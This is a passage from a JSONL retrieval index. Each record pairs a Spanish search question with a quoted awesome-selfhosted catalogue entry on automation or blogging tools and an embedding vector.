workflow, 160 integration packs with 6000+ actions and ChatOps [Apache-2.0, Python]. Β΅Task β€” Automation engine that models and executes business processes declared in yaml [BSD-3-Clause, Go/Docker].", "indexar": "quΓ© herramienta sirve para automatizar respuestas ante incidentes de seguridad?", "v": [0.03552, 0.11749, -0.12133, -0.23128, 0.04344, -0.15549, -0.1534, -0.1569, -0.04297, 0.02388, -0.07202, -0.12318, -0.01974, 0.04576, 0.12617, 0.06057, 0.08361, -0.03909, 0.02271, -0.02035, 0.02159, -0.08754, -0.00084, -0.09888, -0.12891, 0.00348, -0.0223, -0.00753, -0.21683, -0.03374, -0.03163, -0.02617, 0.05271, 0.03511, -0.09643, -0.06972, 0.01977, 0.09544, -0.00624, 0.10816, -0.03504, -0.02123, -0.03412, -0.04673, 0.17218, 0.01812, -0.0339, -0.00752, 0.08806, 0.01585, -0.02636, -0.14143, -0.06051, -0.13743, -0.03262, -0.0548, 0.15057, -0.11602, 0.122, -0.11377, -0.1249, -0.03072, 0.00511, 0.01502, 0.00305, -0.02718, 0.08251, -0.0872, 0.01956, -0.005, -0.0306, 0.0172, 0.0461, 0.03093, -0.00394, -0.02125, -0.0479, 0.09275, -0.04099, 0.0991, -0.01691, 0.06728, -0.03574, -0.01672, -0.02093, -0.06436, 0.02986, -0.07813, -0.04738, 0.01872, -0.00485, 0.14058, 0.06492, -0.0022, -0.00302, -0.04725, 0.06655, -0.05866, -0.04161, 0.00691, 0.10536, -0.13586, -0.03356, 0.04483, 0.01158, -0.04691, -0.02234, 0.02008, 0.01184, -0.11721, -0.00131, 0.05901, -0.04348, -0.00873, -0.02747, 0.09993, -0.01858, -0.0403, 0.06832, 0.039, 0.01665, 0.05969, 0.03723, -0.04276, 0.07758, 0.03766, 0.05878, 0.09119, -0.0352, -0.04966, 0.04205, -0.11023, -0.08805, 0.00121, 0.00078, 0.02685, 0.0342, -0.17392, -0.06676, -0.0593, 0.06595, 0.0532, 0.01197, -0.09203, -0.00516, 0.06702, 0.03419, -0.01779, -0.02226, 0.06696, 0.04228, -0.02013, 0.02145, 0.02576, -0.02419, 0.03918, -0.07776, -0.0317, -0.01534, 0.07046, 0.01584, -0.03614, 0.03833, 0.06542, 0.0241, -0.05002, 0.04934, -0.01395, 0.05248, -0.00776, 0.03843, 0.05649, 0.09922, -0.04857, -0.02422, 0.0062, -0.04588, -0.02651, -0.02762, -0.04752, -0.01465, -0.04341, -0.04437, 0.04097, 0.08193, -0.09219, 0.1114, -0.02124, 0.00823, 0.06524, -0.06646, 0.01908, -0.04423, -0.05203, 0.00987, 0.02253, 0.00566, -0.11393, -0.00315, -0.02212, -0.03595, 0.04141, -0.00867, -0.03231, 0.05495, 0.07325, 0.01713, 0.00695, 0.03308, -0.03673, 0.01207, 0.05535, 0.06604, -0.02183, -0.04392, -0.05806, -0.02467, 0.05372, -0.02482, -0.0009, 0.04256, -0.04582, -0.00707, -0.02554, -0.00382, 0.0389, 0.02518, 0.0127, 0.02912, 0.01862, -0.00803, -0.02243, -0.05843, 0.00639, 0.01612, -0.06335, 0.04672, -0.01147, -0.0263, -0.07763, 0.01178, 0.05769, -0.01936, -0.06845, -0.0638, -0.02154, 0.00722, 0.02298, -0.02031, -0.08475, -0.00142, 0.01951, 0.0194, -0.01415, 0.00778, -0.0265]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: StackStorm β€” StackStorm (aka _IFTTT for Ops_) is event-driven automation for auto-remediation, security responses, troubleshooting, deployments, and more. Includes rules engine, workflow, 160 integration packs with 6000+ actions and ChatOps [Apache-2.0, Python]. Β΅Task β€” Automation engine that models and executes business processes declared in yaml [BSD-3-Clause, Go/Docker].", "indexar": "con quΓ© puedo montar un flujo de trabajo automΓ‘tico basado en eventos?", "v": [0.07802, 0.10627, -0.24772, -0.09701, -0.15412, 0.06477, -0.00629, 0.04503, -0.2128, -0.13905, -0.16246, -0.01714, 0.01033, 0.00899, 0.07805, 0.09605, 0.10846, -0.11334, -0.04121, 0.03867, -0.09418, -0.12572, -0.0652, -0.09235, -0.01757, 0.0138, 0.05138, 0.0526, -0.18616, 0.05145, 0.12269, 0.14442, 0.14842, -0.05341, 0.12686, -0.03413, -0.05628, 0.07828, -0.10772, -0.04723, -0.07804, -0.00959, -0.09989, -0.04268, -0.03686, -0.03292, 0.02861, -0.11704, -0.04858, 0.02991, 0.12195, -0.00814, -0.0459, -0.07711, -0.09375, -0.04201, 0.09125, -0.03812, 0.02031, -0.03799, 0.07342, 0.1248, -0.07425, 0.07286, -0.0484, 0.02677, 0.08039, 0.02847, 0.07355, 0.02859, -0.06759, -0.02961, -0.01692, 0.01719, 0.06582, 0.06014, -0.04285, 0.07643, -0.01505, 0.07938, -0.0455, 0.06477, 0.06154, 0.03906, -0.04346, -0.06345, 0.03529, -0.09183, -0.01929, 0.02724, -0.03009, 0.01583, 0.12324, -0.0153, -0.01891, -0.00838, 0.06677, 0.04284, -0.04474, -0.00131, -0.02093, -0.03211, -0.02385, 0.05769, 0.04737, 0.04094, 0.08228, 0.04631, 0.01481, -0.06856, -0.07031, 0.10302, -0.07785, -0.00823, -0.05995, -0.00158, 0.01528, 0.01703, 0.04779, 0.03824, -0.09839, 0.03934, 0.11424, 0.00442, -0.01009, -0.10852, 0.0822, 0.1166, 0.0056, -0.00422, 0.04604, 0.06002, -0.09626, 0.02719, 0.05432, 0.01462, 0.00202, -0.02505, 0.0247, -0.03532, 0.03128, -0.00464, 0.01785, -0.02353, 0.0647, 0.02751, 0.10366, -0.08989, -0.02719, -0.04145, -0.02786, 0.0549, 0.06691, 0.04707, -0.08797, -0.05332, -0.00736, 0.00442, 0.06085, 0.0365, 0.06144, 0.03891, -0.01345, 0.04877, -0.01053, 0.0282, -0.0926, -0.06596, 0.07342, 0.01996, -0.02041, 0.0146, 0.03256, -0.08114, -0.01241, 0.01999, -0.02357, -0.04518, 0.02136, 0.02903, -0.03214, 0.04998, -0.0324, -0.00975, 0.03853, -0.04797, 0.05292, -0.02093, 0.0173, 0.08565, 0.0169, 0.03866, 0.04532, -0.05839, 0.02469, -0.05453, 0.0049, -0.03536, 0.01706, -0.00957, 0.01139, -0.03472, -0.04213, -0.00868, -0.02291, 0.00773, -0.02089, 0.10269, 0.00464, 0.05251, 0.05608, -0.02776, 0.02256, -0.03622, -0.00293, 0.03655, 0.01143, -0.0527, 0.01167, -0.02181, 0.04265, -0.00527, 0.06787, -0.04742, -0.01338, -0.00215, 0.03983, -0.01213, 0.03878, 0.04576, 0.00411, 0.05211, -0.04179, -0.02811, 0.03108, 0.06541, 0.04798, 0.02853, -0.0246, -0.03554, 0.06621, 0.03145, 0.01844, -0.08595, -0.03827, -0.02447, -0.05759, 0.05887, -0.0758, -0.06139, -0.00738, 0.02039, -0.03429, -0.03481, 0.05287, 0.00256]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: StackStorm β€” StackStorm (aka _IFTTT for Ops_) is event-driven automation for auto-remediation, security responses, troubleshooting, deployments, and more. Includes rules engine, workflow, 160 integration packs with 6000+ actions and ChatOps [Apache-2.0, Python]. Β΅Task β€” Automation engine that models and executes business processes declared in yaml [BSD-3-Clause, Go/Docker].", "indexar": "cual es una alternativa libre a IFTTT para la gestiΓ³n operativa?", "v": [-0.08417, 0.08786, -0.04843, 0.02881, 0.03383, -0.09806, -0.05294, -0.04542, -0.22454, 0.05368, -0.03624, -0.16544, 0.0955, 0.11918, 0.12098, 0.01328, 0.08132, -0.16311, 0.02675, -0.09775, -0.16757, 0.15172, -0.01895, -0.07399, -0.08043, -0.00508, -0.06305, -0.00655, -0.1113, -0.16086, 0.10639, -0.01098, 0.12703, -0.02673, 0.01712, 0.06319, 0.04342, 0.10266, 0.10092, -0.03036, 0.01269, 0.05334, -0.03833, 0.17104, 0.18351, -0.03904, -0.02693, 0.06666, 0.04125, 0.08602, -0.06903, -0.08581, 0.03658, 0.02902, 0.05581, -0.08451, 0.02658, -0.14067, -0.06255, -0.03212, -0.10432, -0.00913, 0.00212, -0.04696, 0.12024, 0.02391, 0.0118, 0.01031, 0.04737, 0.0722, 0.03779, -0.02006, -0.09467, 0.07026, -0.08259, 0.06778, 0.07748, 0.10087, -0.00275, 0.01132, 0.04817, -0.08156, -0.09886, 0.10942, -0.00633, -0.07741, 0.06907, -0.06779, -0.0123, 0.04213, 0.00561, -0.07339, -0.03895, 0.00517, 0.03072, -0.04018, 0.05317, 0.08084, 0.01072, 0.07116, 0.02956, -0.00363, -0.09737, -0.0048, 0.0286, 0.05072, 0.04963, 0.04062, -0.03622, 0.07308, -0.02528, -0.01692, 0.02204, -0.01353, -0.02306, 0.01947, -0.01476, -0.00024, 0.05848, -0.00533, -0.05337, -0.04138, -0.00445, -0.05526, 0.0755, 0.01909, 0.03583, 0.06841, -0.07401, 0.08921, 0.01426, -0.03253, -0.02634, -0.09668, -0.10291, -0.05588, 0.02552, -0.04033, 0.03578, -0.04513, -0.08357, 0.01422, 0.04194, 0.00265, 0.06322, -0.12961, 0.01589, -0.0599, 0.07784, -0.02174, -0.01771, -0.06364, -0.03745, 0.10634, -0.08214, 0.04423, -0.0121, 0.05868, -0.12144, 0.05744, -0.03403, -0.02397, 0.01773, 0.07647, -0.02276, -0.00222, 0.00947, -0.03165, -0.03132, -0.00543, -0.03421, 0.0464, 0.01696, -0.01837, 0.03241, -0.09293, -0.04024, -0.10601, 0.08128, -0.05498, 0.11027, -0.01435, -0.06746, 0.04806, 0.01203, -0.02408, -0.0198, 0.00492, -0.00551, 0.07166, 0.0338, 0.01554, -0.02007, -0.10408, 0.01744, -0.00996, 0.00058, -0.071, -0.00919, -0.04719, -0.06718, -0.0489, 0.04407, -0.00542, -0.01125, -0.0253, -0.01573, 0.07486, 0.04726, 0.03952, 0.03428, -0.01319, 0.07306, 0.0046, -0.0443, -0.0245, -0.02096, -0.01467, 0.01111, -0.03883, 0.05398, 0.00014, 0.01399, 0.02209, -0.00463, 0.0378, 0.00564, 0.03824, -0.00633, 0.01672, 0.01651, 0.00331, -0.00153, 0.05225, 0.00398, -0.02342, 0.0333, 0.06279, 0.03416, -0.05249, 0.03431, 0.08548, -0.05587, -0.01569, -0.00753, -0.00952, -0.09384, 0.01627, -0.07652, -0.0359, -0.01752, 0.00851, -0.03102, 0.0179, 0.03464, 0.0212]} -{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: Antville β€” Free, open source project aimed at the development of a high performance, feature rich weblog hosting software [Apache-2.0, Javascript]. Castopod β€” Podcast management hosting platform that includes the latest podcast 2.0 standards, an automated Fediverse feed, analytics, an embeddable player, and more [AGPL-3.0, PHP/Docker]. Chyrp Lite β€” Extra-awesome, extra-lightweight blog engine [BSD-3-Clause, PHP]. Dotclear β€” Take control over your blog [GPL-2.0, PHP]. Ech0 β€” Lightweight federated publishing platform focused on personal idea sharing (documentation in Chinese) [AGPL-3.0, Docker/K8S]. FlatPress β€” A lightweight, easy-to-set-up flat-file blogging engine [GPL-2.0, PHP]. fx β€” Micro-blog tool offering built-in syntax highlighting, mobile publishing and more (alternative to Twitter, Bluesky) [MIT, Docker]. Ghost β€” Just a blogging platform [MIT, Nodejs]. Haven β€” Private blogging system with markdown editing and built in RSS reader [MIT, Ruby].", "indexar": "que programa es para montar un blog rΓ‘pido y ligero", "v": [0.03589, 0.0583, -0.13773, -0.11148, -0.14752, -0.06041, -0.06834, 0.08694, -0.16314, -0.15554, 0.02508, -0.08657, 0.0711, -0.05058, 0.09725, 0.01708, -0.01606, -0.09642, 0.08447, 0.00341, -0.07195, 0.06227, -0.04974, -0.0978, 0.05668, -0.04109, 0.04217, -0.00851, -0.09264, 0.09659, -0.02808, 0.09522, 0.05269, 0.0526, 0.00184, -0.0412, 0.17252, -0.02783, 0.04363, 0.05553, 0.00395, -0.09097, 0.01115, 0.00798, -0.01372, -0.02205, 0.14475, -0.02971, 0.01514, -0.05359, 0.14367, 0.04157, 0.07938, 0.00712, -0.0257, -0.01286, -0.01253, -0.17292, -0.04274, -0.03335, 0.01384, 0.13011, 0.03778, -0.06232, -0.03661, -0.02637, 0.05341, -0.00032, -0.10604, 0.02153, -0.00054, -0.14891, 0.04211, -0.08115, -0.03934, 0.05002, -0.04442, -0.0006, 0.05403, 0.08751, 0.00196, -0.05814, 0.0493, 0.15014, -0.07505, -0.00739, 0.0755, -0.09494, -0.0492, 0.05059, 0.03978, 0.05936, 0.03809, 0.0424, 0.02799, -0.02216, 0.10834, 0.03932, 0.05979, -0.02401, -0.08979, -0.01466, -0.06726, 0.1232, 0.00971, 0.0429, 0.10747, -0.00742, -0.03481, -0.02583, 0.06568, 0.06908, -0.06128, -0.0047, -0.05827, -0.00525, 0.04196, -0.00632, -0.01341, -0.08693, -0.0993, 0.12309, -0.06026, -0.03524, 0.11809, -0.05713, 0.07354, 0.06877, -0.1106, 0.05681, -0.02471, -0.00423, -0.00369, -0.03675, 0.01147, -0.04918, 0.01653, -0.01317, -0.04456, -0.01484, 0.05051, -0.04693, -0.00097, 0.00478, -0.01018, -0.04598, -0.00171, -0.02499, -0.00428, 0.05942, 0.027, 0.11605, 0.01836, -0.05049, -0.10321, -0.16136, 0.03365, 0.04227, -0.05726, 0.07198, -0.10593, -0.00373, 0.09512, -0.06185, 0.06699, -0.06262, 0.00988, 0.06128, 0.04321, 0.11046, -0.05592, 0.07961, -0.00884, -0.00525, 0.07155, 0.07221, 0.00085, -0.03126, 0.03976, 0.08678, -0.06248, 0.02802, 0.00949, 0.10141, -0.00854, 0.01741, 0.04746, 0.10324, -0.03283, 0.03074, -0.00142, -0.11211, -0.01082, 0.03245, 0.02869, 0.01066, -0.01531, -0.04083, 0.09083, -0.03798, -0.01899, -0.05641, 0.0101, 0.01093, -0.04688, -0.02077, 0.00653, -0.00202, 0.06555, 0.10508, -0.00429, -0.02573, -0.0249, -0.00483, 0.05026, 0.01441, -0.02548, 0.0906, 0.05372, 0.04589, 0.05689, 0.00566, 0.02806, 0.10681, -0.02702, -0.03278, -0.04567, 0.01783, 0.02225, -0.00553, -0.03559, -0.10995, -0.03243, -0.06083, -0.01133, 0.01179, 0.00129, 0.01877, 0.00421, 0.02649, -0.02499, -0.0016, 0.10478, -0.06109, -0.02346, 0.05699, -0.00409, 0.03245, 0.01223, -0.04407, -0.00082, -0.01695, 0.0373, -0.06189, -0.01036, 0.03933]} -{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: Antville β€” Free, open source project aimed at the development of a high performance, feature rich weblog hosting software [Apache-2.0, Javascript]. Castopod β€” Podcast management hosting platform that includes the latest podcast 2.0 standards, an automated Fediverse feed, analytics, an embeddable player, and more [AGPL-3.0, PHP/Docker]. Chyrp Lite β€” Extra-awesome, extra-lightweight blog engine [BSD-3-Clause, PHP]. Dotclear β€” Take control over your blog [GPL-2.0, PHP]. Ech0 β€” Lightweight federated publishing platform focused on personal idea sharing (documentation in Chinese) [AGPL-3.0, Docker/K8S]. FlatPress β€” A lightweight, easy-to-set-up flat-file blogging engine [GPL-2.0, PHP]. fx β€” Micro-blog tool offering built-in syntax highlighting, mobile publishing and more (alternative to Twitter, Bluesky) [MIT, Docker]. Ghost β€” Just a blogging platform [MIT, Nodejs]. Haven β€” Private blogging system with markdown editing and built in RSS reader [MIT, Ruby].", "indexar": "quΓ© alternativa libre hay para gestionar podcasts con streaming automΓ‘tico", "v": [0.04467, 0.11184, -0.0696, -0.23129, -0.06909, -0.01513, -0.06386, -0.05934, -0.09591, -0.05743, -0.07778, -0.1339, -0.03051, 0.02523, 0.01718, -0.01602, 0.17063, -0.04191, 0.07588, 0.06878, -0.01795, 0.03809, -0.03932, -0.10458, 0.11273, -0.03769, 0.10411, 0.02998, -0.14364, 0.02601, -0.05811, 0.00049, 0.00602, -0.0136, -0.1137, 0.04826, 0.10087, 0.20422, -0.02529, -0.0435, -0.01903, 0.0078, 0.00584, 0.07365, 0.02811, -0.02132, -0.05453, 0.04998, -0.06377, 0.07542, -0.06778, -0.07261, -0.03477, 0.08275, 0.08543, -0.02262, -0.01372, -0.23004, -0.07283, -0.07593, -0.11706, 0.05645, 0.01507, -0.01142, -0.0276, 0.05133, -0.02137, 0.06686, -0.06362, 0.15526, -0.04105, -0.07941, 0.02004, 0.04409, 0.0544, 0.0751, -0.02393, -0.00027, 0.06497, 0.05337, 0.07295, -0.14202, 0.0989, 0.07449, -0.00699, 0.08732, 0.01948, -0.02099, -0.03269, 0.06174, -0.00789, -0.01918, 0.03879, 0.03118, -0.01169, -0.02551, 0.10104, -0.06757, 0.0042, -0.04848, -0.05188, 0.08767, -0.09806, 0.05012, 0.03296, 0.0637, 0.00423, -0.06699, -0.05028, 0.06562, -0.00804, 0.06349, 0.02174, -0.00122, -0.02541, -0.02767, 0.0475, -0.04441, 0.01403, 0.06156, -0.04878, 0.03897, 0.00736, -0.0789, 0.06019, -0.01173, 0.07259, 0.02232, 0.0191, 0.01871, 0.06888, -0.07174, -0.04059, -0.14713, -0.01543, -0.06647, 0.00888, 0.02423, -0.04154, -0.02732, -0.07189, 0.06918, 0.00514, -0.01776, 0.05431, -0.19723, -0.00192, -0.11433, 0.03773, -0.04888, -0.01492, -0.01818, -0.11789, -0.01622, 0.01093, -0.00247, -0.05207, -0.08146, -0.0709, 0.03319, 0.07885, -0.06754, -0.01328, -0.01083, -0.02256, -0.01127, 0.02659, 0.03042, -0.03621, -0.04188, -0.04957, 0.08682, 0.06345, -0.12124, -0.00964, -0.07255, 0.01751, -0.07415, 0.13431, -0.03933, -0.07675, -0.0385, -0.0049, -0.05783, -0.04807, -0.02998, -0.03676, -0.00793, -0.03319, 0.06914, -0.0474, 0.03861, -0.07851, -0.0297, 0.11655, 0.03959, -0.00504, -0.06902, -0.07951, 0.04061, -0.10316, -0.02142, 0.05776, 0.01305, -0.01173, 0.00284, 0.00867, 0.02256, 0.08046, 0.07244, 0.00918, -0.01634, 0.03801, 0.00753, -0.06655, -0.01275, -0.01435, 0.00093, -0.02296, 0.0253, -0.01481, 0.01117, 0.05669, -0.02597, 0.02198, 0.04889, 0.04871, 0.02421, 0.00119, -0.0153, -0.01155, 0.03474, 0.00775, 0.07131, -0.00799, -0.02212, 0.00972, 0.05386, -0.06046, -0.00121, -0.02593, 0.06744, 0.05316, 0.03739, -0.01076, 0.02341, -0.03317, 0.06678, -0.04083, 0.01427, -0.0276, 0.01585, -0.03312, 0.05508, 0.02015, 0.02462]} -{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: Antville β€” Free, open source project aimed at the development of a high performance, feature rich weblog hosting software [Apache-2.0, Javascript]. Castopod β€” Podcast management hosting platform that includes the latest podcast 2.0 standards, an automated Fediverse feed, analytics, an embeddable player, and more [AGPL-3.0, PHP/Docker]. Chyrp Lite β€” Extra-awesome, extra-lightweight blog engine [BSD-3-Clause, PHP]. Dotclear β€” Take control over your blog [GPL-2.0, PHP]. Ech0 β€” Lightweight federated publishing platform focused on personal idea sharing (documentation in Chinese) [AGPL-3.0, Docker/K8S]. FlatPress β€” A lightweight, easy-to-set-up flat-file blogging engine [GPL-2.0, PHP]. fx β€” Micro-blog tool offering built-in syntax highlighting, mobile publishing and more (alternative to Twitter, Bluesky) [MIT, Docker]. Ghost β€” Just a blogging platform [MIT, Nodejs]. Haven β€” Private blogging system with markdown editing and built in RSS reader [MIT, Ruby].", "indexar": "con quΓ© puedo crear mi propio microblog sin depender de Twitter", "v": [-0.10076, 0.14866, -0.06665, 0.01816, 0.00685, 0.01005, -0.1669, 0.02296, -0.08069, -0.08455, 0.01681, -0.03317, 0.13128, -0.11046, -0.00906, -0.06777, 0.07735, -0.1134, 0.19858, -0.09938, 0.0513, -0.0194, 0.0317, -0.1083, 0.04646, -0.10961, 0.04045, -0.00562, -0.13064, 0.0315, -0.02246, 0.0861, 0.07649, 0.02165, -0.03112, 0.07169, 0.04053, 0.13597, -0.06361, 0.01854, -0.03977, -0.1055, -0.04634, 0.10579, 0.00109, -0.02983, 0.01353, -0.13629, -0.16107, 0.04454, 0.01034, -0.08943, -0.09494, 0.12664, -0.00906, 0.05098, 0.10715, -0.19242, -0.00471, -0.02553, -0.09741, 0.04437, 0.0061, -0.04037, -0.01642, -0.05557, -0.06784, 0.01531, -0.07445, 0.13819, -0.02044, -0.05223, -0.00623, -0.09984, 0.13787, 0.20607, -0.03991, 0.04617, 0.10347, -0.00825, -0.09355, -0.03776, -0.03492, -0.04975, 0.05882, -0.01621, 0.02082, -0.01758, 0.00168, -0.00247, -0.04527, 0.00362, -0.05702, -0.0398, -0.1286, 0.04221, -0.01128, 0.00482, 0.00908, -0.00062, -0.07207, -0.02101, -0.0401, 0.02957, 0.03791, -0.00327, 0.06619, -0.09472, -0.01971, -0.15627, 0.09149, 0.01253, -0.06215, -0.03439, 0.00588, 0.08231, -0.05988, 0.03458, -0.0097, 0.03095, -0.01708, -0.03295, -0.01945, -0.07651, -0.0326, -0.06096, -0.0387, 0.04692, 0.05603, 0.03562, -0.02203, 0.01098, 0.04607, -0.07451, 0.04523, 0.02028, -0.02925, -0.01275, -0.08233, -0.05228, 0.00652, -0.00072, -0.03565, -0.08881, 0.06333, -0.04225, -0.01471, -0.08329, -0.02652, 0.00249, -0.0581, 0.05905, -0.01142, -0.03921, -0.06822, 0.02746, -0.0489, -0.03551, 0.02926, 0.01471, -0.05718, -0.01846, 0.01624, -0.01489, 0.06295, -0.01545, -0.01245, -0.04024, -0.00049, 0.05127, -0.14, 0.07894, 0.00377, -0.06797, 0.07805, -0.04435, -0.01557, -0.04429, 0.00759, 0.03336, -0.03496, 0.02316, -0.03812, -0.01249, 0.01339, -0.02528, 0.01371, 0.05247, 0.01801, 0.06331, -0.02418, -0.10576, 0.0504, 0.04652, 0.02109, 0.0205, 0.02176, -0.10511, 0.02569, -0.08676, -0.00664, 0.01056, -0.01368, 0.03642, 0.00056, -0.01349, -0.09348, 0.00309, 0.01813, 0.04159, 0.04505, -0.0258, 0.01697, -0.01187, 0.05028, 0.05152, 0.08333, 0.00238, 0.07671, -0.03213, 0.10474, 0.01385, 0.0686, 0.04826, 0.00316, 0.05154, -0.08053, -0.03841, 0.01897, 0.01637, -0.06292, -0.01834, -0.04822, -0.01439, 0.01282, -0.0322, 0.04526, -0.00423, -0.04124, 0.03351, 0.03487, 0.04046, 0.06565, -0.07971, 0.0171, -0.03909, -0.08257, 0.01868, -0.05221, -0.09773, 0.02498, 0.013, 0.09923, -0.00241, 0.02531, 0.03874]} -{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: HTMLy β€” Databaseless PHP blogging platform. A flat-file CMS that allows you to create a fast, secure, and powerful website or blog in seconds [GPL-2.0, PHP]. Known β€” Collaborative social publishing platform [Apache-2.0, PHP]. Mataroa β€” Naked blogging platform for minimalists [MIT, Python]. PluXml β€” XML-based blog/CMS platform [GPL-3.0, PHP]. Serendipity β€” Serendipity (s9y) is a highly extensible and customizable PHP blog engine using Smarty templating [BSD-3-Clause, PHP]. WriteFreely β€” Writing software for starting a minimalist, federated blog β€” or an entire community [AGPL-3.0, Go].", "indexar": "que plataforma me permite montar un blog sin necesidad de una base de datos?", "v": [-0.01557, 0.14719, -0.14833, -0.16556, -0.1117, -0.05344, -0.06654, -0.06476, -0.16354, -0.098, -0.06256, -0.12199, 0.02556, -0.0328, 0.01263, 0.04122, 0.00909, -0.11411, 0.0224, -0.03912, -0.07685, -0.07556, -0.0701, -0.08114, -0.03731, -0.05726, 0.04669, -0.03897, -0.16442, 0.08055, -0.03353, 0.00719, -0.08118, 0.08797, -0.01419, -0.09804, 0.00034, 0.01478, 0.0101, -0.09932, -0.10491, -0.08228, -0.01343, 0.08876, 0.02491, 0.05173, 0.01306, -0.06375, 0.02907, -0.00905, 0.02107, 0.0077, -0.12924, 0.05666, -0.03535, -0.04266, 0.14817, -0.10348, 0.10544, 0.02157, -0.11391, 0.10038, 0.0606, -0.01404, -0.06679, -0.01078, 0.04018, 0.09353, -0.07392, 0.14628, 0.04287, -0.07983, -0.04542, -0.14959, 0.03461, -0.03064, 0.10012, -0.00971, -0.03674, 0.08585, 0.04613, -0.03055, -0.0966, 0.11065, 0.0262, 0.01818, 0.13704, -0.05598, -0.02786, -0.01627, 0.08279, 0.05652, -0.01848, -0.03647, 0.0154, -0.04071, 0.00881, -0.01355, 0.00235, -0.08843, -0.09959, 0.07428, -0.00101, 0.05473, 0.08373, 0.03449, 0.11196, -0.10438, -0.03402, -0.1068, 0.06805, 0.02336, -0.01873, -0.00357, -0.03528, -0.02364, -0.01283, 0.02056, -0.02175, -0.01093, 0.02067, 0.03623, -0.00752, -0.13815, 0.08604, -0.05355, -0.01523, 0.07937, -0.03894, 0.05201, -0.03907, -0.04904, -0.0249, 0.02907, 0.12407, 0.03003, 0.01354, -0.01467, -0.02365, -0.06928, 0.01787, -0.00876, -0.04638, -0.05994, 0.05871, -0.05366, 0.00533, -0.02945, -0.07893, -0.02005, -0.07608, 0.16942, 0.0033, 0.01696, -0.11343, -0.07692, 0.02747, -0.02653, -0.07859, 0.08654, -0.04731, 0.005, 0.00895, 0.04512, 0.00565, -0.07999, 0.01336, 0.05518, 0.00579, 0.06648, -0.03494, 0.10587, 0.0173, -0.06408, 0.0987, 0.05329, -0.07573, -0.0394, -0.02215, 0.06788, -0.02994, -0.06994, -0.02249, 0.05507, 0.02194, -0.00519, 0.0626, -0.0132, -0.00489, 0.0354, 0.01063, 0.00587, -0.03238, 0.0087, 0.06507, -0.05735, -0.06, -0.0027, 0.14109, -0.05738, -0.06921, 0.00382, 0.00108, -0.00827, -0.04406, -0.02808, -0.00577, -0.04153, 0.04089, -0.0334, 0.0108, -0.05077, 0.00285, -0.06705, 0.02453, -0.02378, 0.06415, -0.00405, 0.02302, -0.01989, 0.0062, 0.05566, 0.02627, 0.02669, -0.04981, 0.04319, 0.01287, 0.00634, 0.0209, -0.03875, -0.01735, -0.07726, -0.02687, -0.0381, 0.01912, -0.04094, -0.02049, 0.01781, -0.05045, -0.01497, -0.03165, 0.0427, 0.04775, -0.06145, 0.03407, -0.03425, -0.0609, 0.0632, -0.00474, -0.13283, -0.02014, -0.03071, 0.05519, -0.05689, -0.02395, 0.0003]} -{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: HTMLy β€” Databaseless PHP blogging platform. A flat-file CMS that allows you to create a fast, secure, and powerful website or blog in seconds [GPL-2.0, PHP]. Known β€” Collaborative social publishing platform [Apache-2.0, PHP]. Mataroa β€” Naked blogging platform for minimalists [MIT, Python]. PluXml β€” XML-based blog/CMS platform [GPL-3.0, PHP]. Serendipity β€” Serendipity (s9y) is a highly extensible and customizable PHP blog engine using Smarty templating [BSD-3-Clause, PHP]. WriteFreely β€” Writing software for starting a minimalist, federated blog β€” or an entire community [AGPL-3.0, Go].", "indexar": "cual es la alternativa libre o open source para crear un sitio web o blog en segundos?", "v": [-0.09152, 0.09543, -0.11889, -0.04719, -0.16934, -0.1666, -0.10131, -0.07853, -0.08889, -0.07769, -0.12886, -0.23703, -0.03935, -0.0141, 0.0745, -0.03907, 0.11668, -0.08794, 0.12298, -0.04472, -0.06634, 0.02461, -0.06541, -0.11183, 0.02963, -0.17908, 0.02217, 0.04419, -0.09992, 0.04121, 0.01153, 0.02647, 0.03769, 0.08138, -0.03199, 0.05883, 0.18242, 0.07202, 0.03445, -0.06327, -0.06207, -0.0732, -0.06678, 0.13303, -0.02741, -0.01876, 0.00785, 0.01764, -0.06917, -0.0406, 0.02249, -0.04212, -0.10179, 0.00039, 0.02192, 0.04815, 0.15841, -0.22371, -0.04894, -0.02288, -0.06116, 0.11885, 0.05013, -0.10842, -0.05544, -0.03557, 0.01537, 0.08673, -0.07161, 0.07006, 0.02609, -0.11518, 0.0533, -0.11762, 0.0282, 0.02555, -0.06171, 0.00392, -0.05522, 0.0743, 0.01991, -0.07087, 0.02343, 0.01636, -0.00785, -0.04942, 0.0608, -0.08374, -0.06123, -0.0014, 0.07819, 0.04191, -0.004, 0.0714, -0.08311, -0.09422, 0.04405, 0.01634, 0.02127, 0.00592, -0.05313, 0.02861, -0.08748, -0.01383, 0.0852, 0.01908, 0.06768, -0.01787, -0.07084, -0.04563, 0.08825, 0.03795, 